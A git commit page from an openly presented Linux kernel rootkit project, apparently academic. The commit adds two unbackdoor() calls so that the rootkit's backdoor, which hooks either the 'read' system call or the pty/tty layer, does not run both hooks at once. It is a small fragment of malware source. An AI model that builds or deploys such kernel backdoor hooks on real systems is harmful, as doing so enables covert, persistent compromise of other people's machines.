fixes `read` and `tty` simultaneous backdoor issue - linux-rootkit - Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit 932a607b50edceb9c7b1ed3b2bf7a058ce5afe9b
parent f0a63efab028ba18950a0d6829a13bbd6d5427ea
Author: deurzen <m.deurzen@tum.de>
Date:   Mon, 30 Nov 2020 01:34:07 +0100

fixes `read` and `tty` simultaneous backdoor issue

Diffstat:
M src/channel.c  | 2 ++

1 file changed, 2 insertions(+), 0 deletions(-)
diff --git a/src/channel.c b/src/channel.c
@@ -117,10 +117,12 @@ handle_togglebd(unsigned long arg)
         rootkit.backdoor = BD_OFF;
         msg = "off";
     } else if (sarg < 0) {
+        unbackdoor();
         backdoor_read();
         rootkit.backdoor = BD_READ;
         msg = "hooked into `read`";
     } else if (sarg > 0) {
+        unbackdoor();
         backdoor_tty();
         rootkit.backdoor = BD_TTY;
         msg = "hooked into `{p,t}ty`";

	linux-rootkit Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
	git clone git://git.deurzen.net/linux-rootkit
	Log \| Files \| Refs